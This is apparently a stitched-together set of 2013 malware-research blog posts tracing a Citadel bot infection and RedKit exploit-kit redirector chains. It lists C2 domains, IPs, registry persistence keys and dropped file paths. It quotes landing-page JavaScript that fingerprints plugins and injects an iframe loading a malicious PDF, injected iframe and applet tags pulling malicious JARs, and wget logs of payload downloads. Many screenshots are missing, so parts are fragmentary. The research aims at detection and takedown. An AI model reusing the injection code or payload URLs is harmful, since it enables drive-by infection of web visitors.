the installation of this Citadel bot agent can be viewed with some injection of malicious processes as per below steps:

After this the registry autostart, config saved binary & the self-deletion of batch files+first dropper trojan will be done.

A lot of requests to the Remote Host (suspected C2) like:

Some snapshot registry saved configuration encrypted binary:

In the analysis section we will add more details. This quick review was written for research purpose to quick recognize the same threat spotted alive and infectious in the internet.

The self copied Citadel bot agent has polymorphic its signature into other hash since the self-decrypting process (see the reference PDF page 3), below snapshot is the comparison binary before and after decrypted:

For your comparison purpose I upload new hash generated of self-decrypted malware (maca.exe) into Virus Total too-->>[HERE]
With the result of detection below:

SHA256: 411c56f4a8d3127139da30a1eb468af23770ab00a58a0caa6809c1b4ed56b1b1
SHA1: a42a53082a0d06475e1911dc7a49da90a4896e63
MD5: e292e07eaa5e1eadb7c08ed9a59e38bb
File size: 241.5 KB ( 247296 bytes )
File name: maca.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 14 / 46
Analysis date: 2013-04-08 05:56:26 UTC ( 1 hour, 18 minutes ago )

F-Secure                 : Gen:Variant.Symmi.17062
GData                    : Gen:Variant.Symmi.17062
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/PSW.Zbot.1039
ESET-NOD32               : a variant of Win32/Injector.AEDR
MicroWorld-eScan         : Gen:Variant.Symmi.17062
Avast                    : Win32:Crypt-OZC [Trj]
Kaspersky                : Trojan-Spy.Win32.Zbot.jwcj
BitDefender              : Gen:Variant.Symmi.17062
Malwarebytes             : Trojan.Zbot.HEEP
Ikarus                   : Trojan-Spy.Win32.Zbot
AVG                      : Dropper.Generic7.COPV
Emsisoft                 : Gen:Variant.Symmi.17062 (B)
SUPERAntiSpyware         : Trojan.Agent/Gen-Festo

Malware Analysis

During the first run in the first 18seconds the Citadel bot detected registry information as per below pastes: https://docs.google.com/file/d/0B_YSil_6KDdqWkhtYzRCUTA3WkU/edit?usp=sharing Creation folder & drops components at:

C:\Documents and Settings\%USER%\Application Data\Aqisme [Random]
C:\Documents and Settings\%USER%\Application Data\Aqisme\maca.exe [Random]
C:\Documents and Settings\%USER%\Application Data\Asanf [Random]
C:\Documents and Settings\%USER%\Application Data\Asanf\gego.eww [Random]
C:\Documents and Settings\%USER%\Application Data\Leni" [Random]
C:\Documents and Settings\%USER%\Application Data\Leni\cioci.mii [Random]
C:\Documents and Settings\%USER%\Application Data\Microsoft\Address Book\%USER%.wab 
..Temp\tmpda63997b.bat [Random]
..\Temp\MPS1.tmp [Random]

"Setting auto start.."

HKU\..\Microsoft\Windows\CurrentVersion\\Qywirimoy: "C:\Documents and Settings\%USER%\Application Data\Aqisme\maca.exe"

"Some crypto recorded to be set by this malware.."

HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 1F 01 A1 E2 6D 40 DD A2 F0 E5 7C B3 7C FA 8A 14
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 93 89 C1 90 F9 F2 CE DB 72 D3 C9 79 C7 2E FA 14
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 59 3C CE E5 81 D9 47 D3 F1 F7 4F 5E 66 10 B0 E3
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: C6 94 48 3F AA F7 77 2D A7 C2 2B 6D ED 30 A5 95
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: AC A6 1A E0 75 9C C5 CF 11 8F 94 9F 49 F6 DE DB
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 2A D3 3C EB FD 54 46 AD C1 DD B5 19 0E F5 77 D4
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 48 E3 63 EE 9C 6C F0 CC B0 09 F1 0B E0 D1 33 94
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed,SUCCESS,Type: REG_BINARY, Length: 80, Data: 5E FA 48 5A D4 32 F7 25 CC C3 AD 03 ED 07 EC 4F

"Setting for the shell default.."

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData,SUCCESS,Type: REG_SZ, Length: 94, Data: C:\Documents and Settings\%USER%\Application Data
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Local AppData,SUCCESS,Type: REG_SZ, Length: 124, Data: C:\Documents and Settings\%USER%\Local Settings\Application Data

"Confirming malware data..."

HKCU\Software\Microsoft\Awoveg\Byatefmi,SUCCESS,Type: REG_BINARY, Length: 160, Data: 70 82 DF 35 1E 94 43 6B 6C AC 58 05 D9 A5 DE 45

"Decoded binary config.."

HKU\..\Software\Microsoft\Awoveg\Byatefmi: 70 8C AC 58 05 D9 A5 DE 45 89 E2 55 6E 6F 97 0A 10 0D DB 1B 35 EE 85 08 BD 70 82 DF 35 1E 94 43
HKU\..\Software\Microsoft\Awoveg\Pekeoph:  08 FF 2A D3 71 AD 68 FB A0 98 D9 FF D1 9E 68 A1 B3 EC 73 F8 B9 83 8C 9E 7F B7 E6 66 02 3F 06 80 
45 EC 92 DE DF 57 DE E8 AB 3D C4 4E 65 64 AD 7F 74 E0 9C 71 AA 9A B3 92 D8 2B CF 95 D0 34 41 04 A4 94 39 93 89 A2 8E FA 56 B2 C2 03 7D CC 
97 59 FC B2 76 50 07 AE 92 B1 A1 2F 4F 23 2C 21 BF F9 31 8A 69 29 CC 37 BE 6F 73 B6 4E FD DC 9B CF 8B 5A 68 20 25 86 F4 6B 69 19 2C 0E C1 
B7 64 FE 87 35 49 4D 95 AE 42 98 25 D2 BD 86 81 E2 11 5F D5 B3 A2 3E 13 49 FB 43 1A E2 AF
     :                                  :
<< snipped.. snipped...>>
     :                                  :
A6 56 73 92 9C DF AC 74 40 7A 34 0A B3 8A 53 39 EF 85 68 DB 1D E6 D6 09 08 78 42 95 46 9E 07 E3 1F 63 52 85 56 5F 8E 52 48 EC 4D BD DB 0A 
9B A7 CB AC 73 0D A7 27 4E 6F 4A 6D 66 0E 65 A1 67 98 1F 23 FC C2 83 51 D9 02

"Stangely.. Mailer Address Book pointed to dropped ones.."
HKU\..\Software\Microsoft\WAB\WAB4\Wab File Name\: "C:\Documents and Settings\%USER%\Application Data\Microsoft\Address Book\%USER%.wab"
HKU\..\Software\Microsoft\WAB\WAB4\OlkContactRefresh: 0x00000000
HKU\..\Software\Microsoft\WAB\WAB4\OlkFolderRefresh: 0x00000000
HKU\..\Software\Microsoft\WAB\WAB4\First: 0x00000001

We have two important points one is the encoding using crypto and Mailer Address Book. Other ones are mostly covered by Ahnlab PDF report. Seeing the downloaded data in the malware code (see the next network analysis), I must admit to find a uneasy 6 detailed encryption with number of rounds & key pointing me to the AES/256 chiper used here (see crypto key in the registry above).

I can't have a luxury to play around with the encryption this time, so I search in Google to find the good analysis explaining a concept on how to decode Citadel config here-->>[HERE] (Thank's to Fabien Perigaud). Since the same condition also found in the sample binary on reversing, the rest of decoding steps is suppose to work as he posted guideline (will confirm the detail later).

Wireshark's C2 Analysis

As bot, the networking is important to trace the source of infection.
We made two sessions of capture which can be described all remote requested as per below malware used domains DNS request list:

Upon connected to the requested hosts, the Citadel bot executing HTTP/1.1 POST Requests:

One set of the POST event sent data & its reply:

Request:

..and receiving reply:

The ../pro/file.php POST request session triggering a big binary downloads:

Request details:
..and the esponse:

If we classify the HTTP response we'll see the site which is still up and infected and the one who just got cleaned up, the marked red is active and green is now-clean-site. ( In the active one we see that IP: 89.184.82.143 and 221.132.39.132 )

Where the 89.184.82.143 is actively providing config download:

The current infectious Citadel C2 "alive" IP details:

The currently domains used for the callbacks (the alive domains only:

tableindexcsv.com       89.184.82.143
keximvlc.com.vn         221.132.39.132
www2029.sakura.ne.jp    59.106.171.39
thoikhang.com.vn        203.119.8.111
k-k131.co.jp            59.106.171.39
0704271d3a758a87.com    195.22.26.231

/administrator/modules/mod_menu/tmpl/content.php
/administrator/templates/system/html/file.php
/pro/file.php

   Domain Name: TABLEINDEXCSV.COM
   Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
   Whois Server: whois.PublicDomainRegistry.com
   Referral URL: http://www.PublicDomainRegistry.com
   Name Server: DNS1.NAUNET.RU
   Name Server: DNS2.NAUNET.RU
   Status: clientTransferProhibited
   Updated Date: 01-mar-2013
   Creation Date: 01-mar-2013
   Expiration Date: 01-mar-2014

Samples

We share the sample for the research & raising detection ratio purpose.

Download sample is-->>[HERE]

The difference between my previous analysis and this one is, this was purely analyzed & wrote from a "weaponized" OS X with my bunch of FreeBSD tools recompiled on it.

I hope this writing can be used as a how-to to my friends who used OSX same environment too. So for Mac users, specially for you who are familiar with UNIX/Linux command lines, don't be hurry to switch into other "X" OS for analysis, in my test-drive in writing this post, it proofed that OS X is more than enough to do a deep analysis of any threat.
OK, here we go!

It all begins with the infected site as per below url:

During the access to the site I recorded the below connection with the X11's based Wireshark:

If we follow the package within one http response well, it will show the request for infection below:

We saw 4 or 5 redirection in a row in accessing the infector site above. So I grabbed the "anti-aging-c-35.html?p___= to see the redirected IFRAME code was there, as per below snipped of TextMate:

Why a single html can caused the 4 or 5 redirection? Must be more.. I searched the components included to view this site as per below search tools:
Then I opened my firefox, faking the request to fool the RedKit script and to get the other files used as components to this html, then found the same IFRAME method was injected as per searched in my F*bug:

In details, I went to those script contains the iframe to confirm as per below row of snapshots:



Seeing these I realized that this site is (STILL) completely being used to infect.

I further checked whether the infector site's domain is legit or not:

   Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
   Domain Name: TEVASKINCARE.COM
      Created on: 01-Mar-10
      Expires on: 25-Jul-13
      Last Updated on: 26-Jul-12

   Registrant:
   Teva Skin Science LLC
   117 Lost Forest Drive
   Westminster, SC 29693
   United States

NetRange:       173.201.0.0 - 173.201.255.255
CIDR:           173.201.0.0/16
OriginAS:       AS26496
NetName:        GO-DADDY-COM-LLC

-2013-04-14 18:06:15--  h00p://www.tevaskincare.com/anti-aging-c-35.html?p___=
Resolving www.tevaskincare.com... 173.201.140.74
Caching www.tevaskincare.com => 173.201.140.74
Connecting to www.tevaskincare.com|173.201.140.74|:80... connected.
  :
GET /anti-aging-c-35.html?p___= HTTP/1.1
Referer: Whatever that has google in it..
User-Agent: MalwareMustDie was banging your site to check RedKit infector..
Host: www.tevaskincare.com
HTTP request sent, awaiting response... 
  :
HTTP/1.1 200 OK
Date: Sun, 14 Apr 2013 09:06:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Set-Cookie: osCsid=svle39em7ni3oj6982rjaossm2; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
  :
200 OK
Length: unspecified [text/html]
Saving to: ‘anti-aging-c-35.html?p___=’
2013-04-14 18:06:20 (495 KB/s) - ‘anti-aging-c-35.html?p___=’ saved [6403]

--2013-04-14 18:11:03--  h00p://r-yonemura.jp/eagn.html?i=830988
Resolving r-yonemura.jp... 211.13.204.46
Caching r-yonemura.jp => 211.13.204.46
Connecting to r-yonemura.jp|211.13.204.46|:80... connected.
  :
GET /eagn.html?i=830988 HTTP/1.1
Referer: h00p://www.tevaskincare.com/anti-aging-c-35.html?p___=
User-Agent: Beware malware.. MalwareMustDie is getting closer.. with new toyz..
Host: r-yonemura.jp
HTTP request sent, awaiting response... 
  :
HTTP/1.1 200 OK
Date: Sun, 14 Apr 2013 09:11:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
Saving to: ‘eagn.html?i=830988’
2013-04-14 18:11:07 (0.00 B/s) - ‘eagn.html?i=830988’ saved [0/0]

Anyhow, let's study the site used for second infector:

[Domain Name]                 R-YONEMURA.JP
[Name Server]                 ns.namedserver.net
[Name Server]                 ns2.namedserver.net
[登録年月日]                    2009/12/03
[有効期限]                      2013/12/31
[状態]                          Active
[最終更新]                      2013/01/01 01:05:09 (JST)
[名前]                          株式会社リンクアップ
[Name]                          link up inc

inetnum:        211.13.200.0 - 211.13.204.255
netname:        ISLE-NET
descr:          Isle,inc.
country:        JP
admin-c:        MA117JP

Fortunately, is the infector that I always keep an eye with, I always logged the "good response" as documentation which contained the Landing page that can be used as PoC as per pasted here -->>[HERE]
Now let's see the suspicious data in that landing page.. hope to see the interesting url for exploit infector or maybe a payload?

A Snip of Exploit Kit Landing Page

The plugin detect used...

var Ganni = {
    version: "0.7.7",
    rDate: "04/11/2012",
    name: "Ganni",
    handler: function (c, b, a) {
        return function () {
            c(b, a)
        }

As per it is, the OS detection..

        c.OS = 100;
        if (b) {
            var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, 
                "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, 
                 "Pocket\s*PC", 22.3, "", 100
            ];
            for (f = d.length - 2; f >= 0; f = f - 2) {
                if (d[f] && new RegExp(d[f], "i").test(b)) {
                    c.OS = d[f + 1];
                    break  [...]

Interesting flag of "status" to be pointed after after detecting java

if (c.isIE && !c.ActiveXEnabled && d !== "java") {
            a.status = -2;
            return a
        }
        a.status = 1;  [...]

    Plugins: {
        adobereader: {
            mimeType: "application/pdf",
            navPluginObj: null,
            progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
            classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
            INSTALLED: {},  [...]

flopp = Ganni.getVersion("AdobeReader");
if (flopp) {
    flopp = flopp.split(',');
    sp1 = false;
    if (flopp[1] < 4 && 9 == flopp[0]) sp1 = true;
    if (flopp[1] < 3 && flopp[0] == 8) sp1 = true;

    if (sp1) {
        bosfef.setAttribute("width", 31);
        bosfef.setAttribute("height", 13);

insertHTML: function (g, b, h, a, l) {
    var m, n = document,
        k = this,
        q, p = n.createElement("span"),
        o, j, f = "<";
    var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
    var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
    if (!k.isDefined(a)) {
        a = ""
    }
    if (k.isString(g) && (/[^\s]/).test(g)) {
        g = g.toLowerCase().replace(/\s/g, "");
        q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
        q += 'style="' + i + 'display:inline;" ';
        for (o = 0; o < b.length; o = o + 2) {
            if (/[^\s]/.test(b[o + 1])) {
                q += b[o] + '="' + b[o + 1] + '" '
            }
        }
        q += ">";
        for (o = 0; o < h.length; o = o + 2) {
            if (/[^\s]/.test(h[o + 1])) {
                q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
            }
        }
        q += a + f + "/" + g + ">"
    } else {
        q = a
    }  [...]

var bosfef = document.createElement("iframe");
function dettq() {
    document.body.appendChild(bosfef);
    bosfef.setAttribute(jsou, "h00p://marykay-duka.kharkov.ua/987.pdf");}

File's currently unavailable (smile), or tango moved faster?

GET /987.pdf HTTP/1.1
Host: marykay-duka.kharkov.ua ( 91.206.200.199)
HTTP request sent, awaiting response... 
  :
HTTP/1.1 404 Not Found
Server: nginx/1.1.10
Date: Sun, 14 Apr 2013 13:12:13 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: keep-alive
  :
404 Not Found
The requested URL /987.pdf was not found on this server
] done.
2013-04-14 22:12:15 ERROR 404: Not Found.

What's with 91.206.200.199 ?

This is the main course of this story actually. As we can see the marykay-duka.kharkov.ua is a domain served in the Ukrainian Hosting service. The IP officially own by this host w/reversed IP registered by:

"web17.ukraine.com.ua  A  91.206.200.199"

"inetnum:        91.206.200.0 - 91.206.201.255
netname:        Hosting
descr:          Delta-X LTD"
org:            ORG-LA230-RIPE
country:        UA
admin-c:        RIV3-RIPE
tech-c:         RIV3-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-END-MNT
mnt-by:         DELTAXUA-MNT

organisation:   ORG-LA230-RIPE
org-name:       "DELTA-X" LTD
org-type:       OTHER
"address:        Ukriane, Kyiv
address:        Bogdana Khmelnitskogo 16/22, r. 504/1
abuse-mailbox:  abuse@delta-x.ua"
admin-c:        RIV3-RIPE
person:         Rudenko Ilya Vladimirovich
address:        UA, Kyiv, 03065
address:        PO Box 65
phone:          +38(044)392-74-33
abuse-mailbox:  abuse@delta-x.ua

"Some PoC of infections in this Hosting server's IP..
urlquery ALSO detected other action in some of the domains under this IP..."

url: http://urlquery.net/search.php?q=91.206.200.199&type=string&start=2013-01-14&end=2013-04-14&max=50

Date (CET) Alerts / IDS URL IP  
2013-04-14 15:40:35 0 / 0 "h00p://marykay-duka.kharkov.ua"               91.206.200.199
2013-04-04 16:38:05 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199
2013-04-04 15:59:02 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199

"And so does Virus Total.."

url: https://www.virustotal.com/en/ip-address/91.206.200.199/information/
2/36 2013-04-11 11:23:26 "h00p://chevrole.org.ua/"

"..while these are domains with via UKRAINE.COM.UA registrar -
with NS, a PoC of hosting (provided set of domains + DNS)"

490968298.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
overfuns.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pro100soft.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
ukrjudo.com,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
zverdvd.org,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pamparam.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pr-plus.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
metal-forming.org,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
    [...] etc [...]

"AND these domains are pointed to an IP address w/o proper NS sets.."

chevrole.org.ua,91.206.200.199,
forum.zverdvd.org,91.206.200.43,91.206.200.199,
funmobile.com.ua,91.206.200.199,
marykay-duka.kharkov.ua,91.206.200.199,
2sen.ru,91.206.200.199,91.206.200.199,
papercraft.su,91.206.200.210,
reshebniki.org.ua,91.206.200.43,91.206.200.199,

Furthermore the domain used for infection in our case is belong to below info:

domain:  marykay-duka.kharkov.ua
descr:   Domain registered for customer of Ukraine.com.ua
admin-c: DELTA-EUNIC
tech-c:  DELTA-EUNIC
nserver: ns1.ukraine.com.ua
nserver: ns2.ukraine.com.ua
nserver: ns3.ukraine.com.ua
mnt-by:  DELTA-MNT-EUNIC
reg-by:  DELTA-REG-EUNIC
changed: hostmaster@deltahosting.com.ua 20130308
source:  EUNIC
Transfer:            locked
Record created:      2011-03-11
Record last updated: 2013-03-08
Record registered:   2011-03-11
Record expires:      2014-03-11
Status:              OK

References

The below numbers are link to the infection references that can be used for our infector dismantling (TangoDown) purpose:

[1][2][3][4][5]

#MalwareMustDie

The point of this post is exposing the malware components (in this case is RedKit Exploit Kit infector & Kelihos Botnet malware) used network pre and post infection for the dismantling purpose. The information will be added frequently for some deep investigation to mitigate the overall malicious scheme is still on going, and please bear for some details just cannot be published yet.

To make things clear. This is the pilot analysis of the current mass-infection, so many variation in the RedKit redirector URLs (the one with the regex: [a-z{4}.html), JARs (same logic, different regex of binary downloads w/regex: [a-z]{2}.html ), Kelihos downloaders (the one who download newbos3.exe, using hard-coded url in binary), range of the new botnets used (The Flux is growing/changing still now). So, what has been written here is not everything! There are more of these bad-stuff out there online now, so if you may (to researchers. law enforcement and AV industry), please use this post as a lead to dig and nail deeper. Please also bear me for the regular updates and several "additionals". I will post

All samples with captured data are shared as usual is in the bottom of this post, as soon as I can get time to re-organize back my stuff.
OK, here we go..

Big picture of current infection

#MalwareMustDie - Big Picture of the current #Kelihos Family infection components - Use this pic for your purpose. twitter.com/MalwareMustDie…

— Malware Crusaders (@MalwareMustDie) April 20, 2013

Source of infection

Redkit Exploit Kit was used in this scheme, the crocodiles was finally coming to the surface for the chance to perform a mass hit in timing like this.
You'll see the front infector in spams with the below rules:

http://[whatever domain OR IP address]/news.html
http://[whatever domain OR IP address]/boston.html
http://[whatever domain OR IP address]/texas.html

Every "decent" researchers worked together by doing great job to put the infector URL in URLquery.
You shall see it in here : [1][2][3]I took first pattern of URLQuery posted urls above in unique IP as "analysis sample":

2013-04-20 05:08:55 0 / 8 h00p://78.90.213.244/news.html [Bulgaria] 78.90.213.244
2013-04-19 22:32:04 0 / 0 h00p://94.28.49.130/news.html  [Russian Federation] 94.28.49.130
2013-04-19 20:32:31 0 / 6 h00p://159.148.43.126/news.html [Latvia] 159.148.43.126
2013-04-19 20:26:25 0 / 0 h00p://31.133.84.65/news.html  [Ukraine] 31.133.84.65
2013-04-19 20:25:43 0 / 3 h00p://163.27.205.57/news.html [Taiwan] 163.27.205.57
2013-04-19 17:10:01 0 / 0 h00p://186.34.217.247/news.html [Chile] 186.34.217.247
2013-04-19 12:25:58 0 / 0 h00p://186.34.217.247/news.html [Chile] 186.34.217.247
2013-04-19 11:36:04 0 / 0 h00p://93.78.201.13/news.html  [Ukraine] 93.78.201.13
2013-04-19 05:18:16 0 / 3 h00p://77.122.123.39/news.html [Ukraine] 77.122.123.39
2013-04-19 02:14:03 0 / 0 h00p://178.150.115.38/news.html [Ukraine] 178.150.115.38
2013-04-18 18:10:17 0 / 0 h00p://83.170.192.154/news.html [Ukraine] 83.170.192.154
2013-04-18 16:41:24 0 / 7 h00p://46.40.33.20/news.html  [Serbia] 46.40.33.20
2013-04-18 15:45:21 0 / 3 h00p://182.235.147.164/news.html [Taiwan] 182.235.147.164
2013-04-18 15:43:14 0 / 8 h00p://85.198.81.26/news.html  [Russian Federation] 85.198.81.26
2013-04-18 15:22:31 0 / 0 h00p://213.231.13.137/news.html [Ukraine] 213.231.13.137
2013-04-18 07:11:46 0 / 0 h00p://93.79.163.4/news.html  [Ukraine] 93.79.163.4
2013-04-18 05:17:17 0 / 0 h00p://95.69.141.121/news.html [Ukraine] 95.69.141.121
2013-04-18 00:35:30 0 / 0 h00p://178.137.120.224/news.html [Ukraine] 178.137.120.224
2013-04-17 20:36:20 0 / 0 h00p://213.34.205.27/news.html [Kuwait] 213.34.205.27
2013-04-17 19:37:44 0 / 0 h00p://118.141.37.122/news.html [Hong Kong] 118.141.37.122
2013-04-17 19:25:35 0 / 8 h00p://37.229.215.183/news.html [Ukraine] 37.229.215.183
2013-04-17 18:45:20 0 / 0 h00p://85.217.234.98/news.html [Bulgaria] 85.217.234.98
2013-04-17 18:35:56 0 / 0 h00p://95.69.141.121/news.html [Ukraine] 95.69.141.121
2013-04-17 18:12:39 0 / 0 h00p://110.92.80.47/news.html  [Japan] 110.92.80.47
2013-04-17 17:15:32 0 / 0 h00p://176.241.148.169/news.html [Ukraine] 176.241.148.169
2013-04-17 16:43:15 0 / 0 h00p://62.45.148.76/news.html  [Netherlands] 62.45.148.76
2013-04-17 16:27:40 0 / 0 h00p://190.245.177.248/news.html [Argentina] 190.245.177.248
2013-04-17 15:33:39 0 / 8 h00p://219.198.196.116/news.html [Japan] 219.198.196.116
2013-04-17 15:23:41 0 / 0 h00p://95.87.6.156/news.html  [Bulgaria] 95.87.6.156
2013-04-17 14:54:40 0 / 0 h00p://83.170.192.154/news.html [Ukraine] 83.170.192.154
2013-04-17 14:11:51 0 / 0 h00p://188.2.164.112/news.html [Serbia] 188.2.164.112
2013-04-17 13:52:05 0 / 0 h00p://83.170.192.154/news.html [Ukraine] 83.170.192.154
2013-04-17 13:27:23 0 / 2 h00p://78.90.133.133/news.html [Bulgaria] 78.90.133.133
2013-04-17 12:14:12 0 / 0 h00p://178.137.100.12/news.html [Ukraine] 178.137.100.12
2013-04-17 11:27:53 0 / 2 h00p://91.241.177.162/news.html [Ukraine] 91.241.177.162
2013-04-17 10:53:11 0 / 0 h00p://46.233.4.113/news.html  [Bulgaria] 46.233.4.113
2013-04-17 10:42:21 0 / 2 h00p://61.63.123.44/news.html  [Taiwan] 61.63.123.44
2013-04-17 10:06:47 0 / 5 h00p://94.153.15.249/news.html [Ukraine] 94.153.15.249
2013-04-17 09:36:41 0 / 0 h00p://212.75.18.190/news.html [Bulgaria] 212.75.18.190
2013-04-17 04:10:58 0 / 3 h00p://37.229.92.116/news.html [Ukraine] 37.229.92.116

--2013-04-20 13:35:39--  h00p://110.92.80.47/news.html
seconds 0.00, Connecting to 110.92.80.47:80... seconds 0.00, connected.
  :
GET /news.html HTTP/1.0
Host: 110.92.80.47
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 800
Content-Type: text/html
Last-Modified: ╤ß, 20 α∩≡ 2013 04:35:35 GMT
Accept-Ranges: bytes
200 Ok
Length: 800 [text/html]
Saving to: `news.html'
2013-04-20 13:35:39 (6.21 KB/s) - `news.html' saved [800/800]

  [...]
＜title＞Hot News:Fertilizer Plant Explosion Near Waco, Texas＜/title＞
  [...]
＜body＞

＜iframe width="640" height="360"
src="h00ps://www.youtube.com/embed/ROrpKx3aIjA"＞
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://www.youtube.com/embed/0YMv21-XTEc"＞
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://www.youtube.com/embed/RxAC2tCUYjI"＞
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://www.youtube.com/embed/9r3xtLbzkB4"＞
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://www.youtube.com/embed/yITS8iWeQQQ"＞
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://mert-teknik(.)com/wesq.html"＞   // ＜=== 
＜/iframe＞
  [...]

  [...]
＜iframe width="640" height="360"
src="http://balimaps(.)net/oesr.html"＞   // ＜==== another 
＜/iframe＞

＜/body＞
  [...]

＜iframe width="640" height="360"
src="h00p://macgrooders(.)com/zasr.html"＞  // ＜==== more 
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://kadiakitchen(.)com/owsq.html"＞ // ＜==== "Moar" 
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://inkdish(.)com/amsr.html"＞ // ＜==== "Moar" 
＜/iframe＞

＜iframe width="640" height="360"
src="h00p://http://turbonacho(.)com/ocsr.html"＞ // ＜====  
＜/iframe＞
// The link was changing into:
"h00p://tntpleasures(.)com/ceiq.html" and // <====
"h00p://www.rkconnect(.)com/wosr.html"  // <===

"Downloaded..."

--2013-04-20 13:46:25--  h00p://mert-teknik.com/wesq.html
Resolving mert-teknik.com... seconds 0.00, 74.54.176.162
Caching mert-teknik.com => 74.54.176.162
Connecting to mert-teknik.com|74.54.176.162|:80... seconds 0.00, connected.
  :
GET /wesq.html HTTP/1.0
Referer: h00p://110.92.80.47/news.html
Host: mert-teknik.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 20 Apr 2013 04:46:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
  :
200 OK
Length: unspecified [text/html]
Saving to: `wesq.html'
2013-04-20 13:46:25 (5.84 MB/s) - `wesq.html' saved [202]

"malware infector code....this is never be good..."

＜html＞＜body＞ ＜b＞Unexpected Error. Please, try again later.＜/b＞ 
＜applet name="x25h" code="Code.class" archive="492.jar"＞ 
＜param name="name" value="/ggc299x8ugjg8nhin05?x9t-0/gxs"＞ 
＜/applet＞＜/body＞＜/html＞

The first access recorded:
Looking deeper I downloaded the JAR, the first scenario of IFRAME redirection mentioned above downloading you:

--2013-04-20 13:51:27--  h00p://mert-teknik.com/492.jar
Resolving mert-teknik.com... seconds 0.00, 74.54.176.162
Connecting to mert-teknik.com|74.54.176.162|:80... seconds 0.00, connected.
  :
GET /492.jar HTTP/1.0
Referer: http://110.92.80.47/news.html
Host: mert-teknik.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 20 Apr 2013 04:51:25 GMT
Server: Apache
Content-Disposition: inline; filename=492.jar
Content-Length: 13239
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/java-archive
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 13239 (13K) [application/java-archive]
Saving to: `492.jar'
2013-04-20 13:51:28 (1.26 MB/s) - `492.jar' saved [13239/13239]

"the code insides..."

＜html＞＜body＞ ＜b＞Unexpected Error. Please, try again later.＜/b＞ 
＜applet name="x25h" code="Code.class" archive="dp4.jar"＞ 
＜param name="name" value="/ggc299&esixecl0h8g9f:0/gxs"＞ ＜/applet＞＜/body＞＜/html＞

"get the jar....a PCAP txt paste.."

GET /dp4.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_23
Host: balimaps.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sat, 20 Apr 2013 06:01:40 GMT
